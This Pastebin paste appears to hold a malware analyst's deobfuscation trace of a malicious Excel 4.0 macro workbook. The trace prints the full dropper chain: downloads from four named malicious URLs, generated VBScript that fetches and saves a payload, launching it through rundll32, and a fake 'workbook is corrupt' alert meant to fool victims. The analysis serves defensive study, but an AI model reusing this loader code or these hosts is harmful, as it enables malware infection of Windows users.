  275. CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  276. CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  277. CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
  278. CELL:CU38582 , FullEvaluation , [TRUE] GOTO(R38588C99)
  279. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  280. CELL:CU38582 , FullEvaluation , [FALSE]
  281. CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  282. CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  283. CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  284. CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
  285. CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  286. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  287. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  288. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  289. CELL:CU38574 , FullEvaluation , [FALSE]
  290. CELL:CU38575 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  291. CELL:CU38576 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  292. CELL:CU38577 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  293. CELL:CU38578 , FullEvaluation , IF(R38576C99<40000,,GOTO(R38589C99))
  294. CELL:CU38579 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
  295. CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  296. CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  297. CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
  298. CELL:CU38582 , FullEvaluation , [FALSE]
  299. CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  300. CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  301. CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  302. CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
  303. CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  304. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  305. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  306. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  307. CELL:AQ33177 , FullEvaluation , [FALSE] GOTO(R26995C97)
  308. CELL:CS26995 , FullEvaluation , "=""C:\Users\Public\ezNJJrCR.html"""
  309. CELL:CS26996 , FullEvaluation , "=""C:\Users\Public\CiOnQpVy.vbs"""
  310. CELL:CS26997 , FullEvaluation , "=FOPEN(R62431C74,3)"
  311. CELL:CS26998 , FullEvaluation , "=FWRITELN(R62432C74,""M1UW = """"https://wireborg.com/wp-keys.php"""""")"
  312. CELL:CS26999 , FullEvaluation , "=FWRITELN(R62432C74,""U4Uo = """"http://zmedia.shwetech.com/wp-keys.php"""""")"
  313. CELL:CS27000 , FullEvaluation , "=FWRITELN(R62432C74,""pqlyh = """"https://datalibacbi.ml/wp-keys.php"""""")"
  314. CELL:CS27001 , FullEvaluation , "=FWRITELN(R62432C74,""OeDOJy = """"https://procacardenla.ga/wp-keys.php"""""")"
  315. CELL:CS27002 , FullEvaluation , "=FWRITELN(R62432C74,""DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)"")"
  316. CELL:CS27003 , FullEvaluation , "=FWRITELN(R62432C74,""Dim OJxd: Set OJxd = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  317. CELL:CS27004 , FullEvaluation , "=FWRITELN(R62432C74,""Function Uj8Ty(data):"")"
  318. CELL:CS27005 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.setOption(2) = 13056"")"
  319. CELL:CS27006 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.Open """"GET"""", data, False"")"
  320. CELL:CS27007 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  321. CELL:CS27008 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.Send"")"
  322. CELL:CS27009 , FullEvaluation , "=FWRITELN(R62432C74,""Uj8Ty = OJxd.Status"")"
  323. CELL:CS27010 , FullEvaluation , "=FWRITELN(R62432C74,""End Function"")"
  324. CELL:CS27011 , FullEvaluation , "=FWRITELN(R62432C74,""For Each o37s4 in DcH"")"
  325. CELL:CS27012 , FullEvaluation , "=FWRITELN(R62432C74,""If Uj8Ty(o37s4) = 200 Then"")"
  326. CELL:CS27013 , FullEvaluation , "=FWRITELN(R62432C74,""Dim qjDgRsx: Set qjDgRsx = CreateObject(""""ADODB.Stream"""")"")"
  327. CELL:CS27014 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Open"")"
  328. CELL:CS27015 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Type = 1"")"
  329. CELL:CS27016 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Write OJxd.ResponseBody"")"
  330. CELL:CS27017 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.SaveToFile """"""&R62430C74&"""""", 2"")"
  331. CELL:CS27018 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Close"")"
  332. CELL:CS27019 , FullEvaluation , "=FWRITELN(R62432C74,""Exit For"")"
  333. CELL:CS27020 , FullEvaluation , "=FWRITELN(R62432C74,""End If"")"
  334. CELL:CS27021 , FullEvaluation , "=FWRITELN(R62432C74,""Next"")"
  335. CELL:CS27022 , FullEvaluation , "=FCLOSE(R62432C74)"
  336. CELL:CS27023 , FullEvaluation , "=EXEC(""explorer.exe ""&R62431C74&"""")"
  337. CELL:CS27024 , FullEvaluation , "=WHILE(ISERROR(FILES(R62430C74)))"
  338. CELL:CS27025 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  339. CELL:CS27026 , FullEvaluation , "=NEXT()"
  340. CELL:CS27027 , FullEvaluation , "=FILE.DELETE(R62431C74)"
  341. CELL:CS27028 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  342. CELL:CS27029 , FullEvaluation , "=""C:\Users\Public\EgkL.vbs"""
  343. CELL:CS27030 , FullEvaluation , "=FOPEN(R62464C74,3)"
  344. CELL:CS27031 , FullEvaluation , "=""rundll32.exe"""
  345. CELL:CS27032 , FullEvaluation , "=R62430C74&"",DllRegisterServer"""
  346. CELL:CS27033 , FullEvaluation , "=""C:\Windows\System32"""
  347. CELL:CS27034 , FullEvaluation , "=FWRITELN(R62465C74,""Set b7H = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  348. CELL:CS27035 , FullEvaluation , "=FWRITELN(R62465C74,""b7H.Document.Application.ShellExecute """"""&R62466C74&"""""",""""""&R62467C74&"""""",""""""&R62468C74&"""""",Null,0"")"
  349. CELL:CS27036 , FullEvaluation , "=FCLOSE(R62465C74)"
  350. CELL:CS27037 , FullEvaluation , "=EXEC(""explorer.exe ""&R62464C74&"""")"
  351. CELL:CS27038 , FullEvaluation , "=GOTO(R33146C43)"
  352. CELL:CS27039 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________82)
  353. CELL:HH20519 , FullEvaluation , FORMULA("=FORMULA(R[6475]C[-119],R[41910]C[-142])",egaz0Af2DyYfLadkmB$HH$20520:$HH$20563)
  354. CELL:HH20520 , FullEvaluation , FORMULA("=""C:\Users\Public\ezNJJrCR.html""",R[41910]C[-142])
  355. CELL:HH20521 , FullEvaluation , FORMULA("=""C:\Users\Public\CiOnQpVy.vbs""",R[41910]C[-142])
  356. CELL:HH20522 , FullEvaluation , FORMULA("=FOPEN(R62431C74,3)",R[41910]C[-142])
  357. CELL:HH20523 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""M1UW = """"https://wireborg.com/wp-keys.php"""""")",R[41910]C[-142])
  358. CELL:HH20524 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""U4Uo = """"http://zmedia.shwetech.com/wp-keys.php"""""")",R[41910]C[-142])
  359. CELL:HH20525 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""pqlyh = """"https://datalibacbi.ml/wp-keys.php"""""")",R[41910]C[-142])
  360. CELL:HH20526 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OeDOJy = """"https://procacardenla.ga/wp-keys.php"""""")",R[41910]C[-142])
  361. CELL:HH20527 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)"")",R[41910]C[-142])
  362. CELL:HH20528 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Dim OJxd: Set OJxd = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")",R[41910]C[-142])
  363. CELL:HH20529 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Function Uj8Ty(data):"")",R[41910]C[-142])
  364. CELL:HH20530 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.setOption(2) = 13056"")",R[41910]C[-142])
  365. CELL:HH20531 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.Open """"GET"""", data, False"")",R[41910]C[-142])
  366. CELL:HH20532 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")",R[41910]C[-142])
  367. CELL:HH20533 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.Send"")",R[41910]C[-142])
  368. CELL:HH20534 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Uj8Ty = OJxd.Status"")",R[41910]C[-142])
  369. CELL:HH20535 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""End Function"")",R[41910]C[-142])
  370. CELL:HH20536 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""For Each o37s4 in DcH"")",R[41910]C[-142])
  371. CELL:HH20537 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""If Uj8Ty(o37s4) = 200 Then"")",R[41910]C[-142])
  372. CELL:HH20538 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Dim qjDgRsx: Set qjDgRsx = CreateObject(""""ADODB.Stream"""")"")",R[41910]C[-142])
  373. CELL:HH20539 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Open"")",R[41910]C[-142])
  374. CELL:HH20540 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Type = 1"")",R[41910]C[-142])
  375. CELL:HH20541 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Write OJxd.ResponseBody"")",R[41910]C[-142])
  376. CELL:HH20542 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.SaveToFile """"""&R62430C74&"""""", 2"")",R[41910]C[-142])
  377. CELL:HH20543 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Close"")",R[41910]C[-142])
  378. CELL:HH20544 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Exit For"")",R[41910]C[-142])
  379. CELL:HH20545 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""End If"")",R[41910]C[-142])
  380. CELL:HH20546 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Next"")",R[41910]C[-142])
  381. CELL:HH20547 , FullEvaluation , FORMULA("=FCLOSE(R62432C74)",R[41910]C[-142])
  382. CELL:HH20548 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R62431C74&"""")",R[41910]C[-142])
  383. CELL:HH20549 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R62430C74)))",R[41910]C[-142])
  384. CELL:HH20550 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[41910]C[-142])
  385. CELL:HH20551 , FullEvaluation , FORMULA("=NEXT()",R[41910]C[-142])
  386. CELL:HH20552 , FullEvaluation , FORMULA("=FILE.DELETE(R62431C74)",R[41910]C[-142])
  387. CELL:HH20553 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")",R[41910]C[-142])
  388. CELL:HH20554 , FullEvaluation , FORMULA("=""C:\Users\Public\EgkL.vbs""",R[41910]C[-142])
  389. CELL:HH20555 , FullEvaluation , FORMULA("=FOPEN(R62464C74,3)",R[41910]C[-142])
  390. CELL:HH20556 , FullEvaluation , FORMULA("=""rundll32.exe""",R[41910]C[-142])
  391. CELL:HH20557 , FullEvaluation , FORMULA("=R62430C74&"",DllRegisterServer""",R[41910]C[-142])
  392. CELL:HH20558 , FullEvaluation , FORMULA("=""C:\Windows\System32""",R[41910]C[-142])
  393. CELL:HH20559 , FullEvaluation , FORMULA("=FWRITELN(R62465C74,""Set b7H = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")",R[41910]C[-142])
  394. CELL:HH20560 , FullEvaluation , FORMULA("=FWRITELN(R62465C74,""b7H.Document.Application.ShellExecute """"""&R62466C74&"""""",""""""&R62467C74&"""""",""""""&R62468C74&"""""",Null,0"")",R[41910]C[-142])
  395. CELL:HH20561 , FullEvaluation , FORMULA("=FCLOSE(R62465C74)",R[41910]C[-142])
  396. CELL:HH20562 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R62464C74&"""")",R[41910]C[-142])
  397. CELL:HH20563 , FullEvaluation , FORMULA("=GOTO(R33146C43)",R[41910]C[-142])
  398. CELL:HH20564 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________83)
  399. CELL:BV62430 , FullEvaluation , "C:\Users\Public\ezNJJrCR.html"
  400. CELL:BV62431 , FullEvaluation , "C:\Users\Public\CiOnQpVy.vbs"
  401. CELL:BV62432 , PartialEvaluation , FOPEN("C:\Users\Public\CiOnQpVy.vbs",3)
  402. CELL:BV62433 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","M1UW = ""https://wireborg.com/wp-keys.php""")
  403. CELL:BV62434 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","U4Uo = ""http://zmedia.shwetech.com/wp-keys.php""")
  404. CELL:BV62435 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","pqlyh = ""https://datalibacbi.ml/wp-keys.php""")
  405. CELL:BV62436 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OeDOJy = ""https://procacardenla.ga/wp-keys.php""")
  406. CELL:BV62437 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)")
  407. CELL:BV62438 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Dim OJxd: Set OJxd = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
  408. CELL:BV62439 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Function Uj8Ty(data):")
  409. CELL:BV62440 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.setOption(2) = 13056")
  410. CELL:BV62441 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.Open ""GET"", data, False")
  411. CELL:BV62442 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")
  412. CELL:BV62443 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.Send")
  413. CELL:BV62444 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Uj8Ty = OJxd.Status")
  414. CELL:BV62445 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","End Function")
  415. CELL:BV62446 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","For Each o37s4 in DcH")
  416. CELL:BV62447 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","If Uj8Ty(o37s4) = 200 Then")
  417. CELL:BV62448 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Dim qjDgRsx: Set qjDgRsx = CreateObject(""ADODB.Stream"")")
  418. CELL:BV62449 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Open")
  419. CELL:BV62450 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Type = 1")
  420. CELL:BV62451 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Write OJxd.ResponseBody")
  421. CELL:BV62452 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.SaveToFile ""C:\Users\Public\ezNJJrCR.html"", 2")
  422. CELL:BV62453 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Close")
  423. CELL:BV62454 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Exit For")
  424. CELL:BV62455 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","End If")
  425. CELL:BV62456 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Next")
  426. CELL:BV62457 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)")
  427. CELL:BV62458 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\CiOnQpVy.vbs")
  428. CELL:BV62459 , PartialEvaluation , WHILE(ISERROR(FILES(R62430C74)))
  429. CELL:BV62462 , PartialEvaluation , FILE.DELETE("C:\Users\Public\CiOnQpVy.vbs")
  430. CELL:BV62463 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
  431. CELL:BV62464 , FullEvaluation , "C:\Users\Public\EgkL.vbs"
  432. CELL:BV62465 , PartialEvaluation , FOPEN("C:\Users\Public\EgkL.vbs",3)
  433. CELL:BV62466 , FullEvaluation , "rundll32.exe"
  434. CELL:BV62467 , FullEvaluation , "C:\Users\Public\ezNJJrCR.html,DllRegisterServer"
  435. CELL:BV62468 , FullEvaluation , "C:\Windows\System32"
  436. CELL:BV62469 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\EgkL.vbs"",3)","Set b7H = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
  437. CELL:BV62470 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\EgkL.vbs"",3)","b7H.Document.Application.ShellExecute ""rundll32.exe"",""C:\Users\Public\ezNJJrCR.html,DllRegisterServer"",""C:\Windows\System32"",Null,0")
  438. CELL:BV62471 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\EgkL.vbs"",3)")
  439. CELL:BV62472 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\EgkL.vbs")
  440. CELL:BV62473 , FullEvaluation , GOTO(R33146C43)
  441. CELL:AQ33146 , End , CLOSE(FALSE)
  442. CELL:AQ33156 , FullEvaluation , [FALSE] GOTO(R33146C43)
  443. CELL:AQ33146 , End , CLOSE(FALSE)
  444. [END of Deobfuscation]
  445. time elapsed: 10.969358205795288
  446.  
  447. Process finished with exit code 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!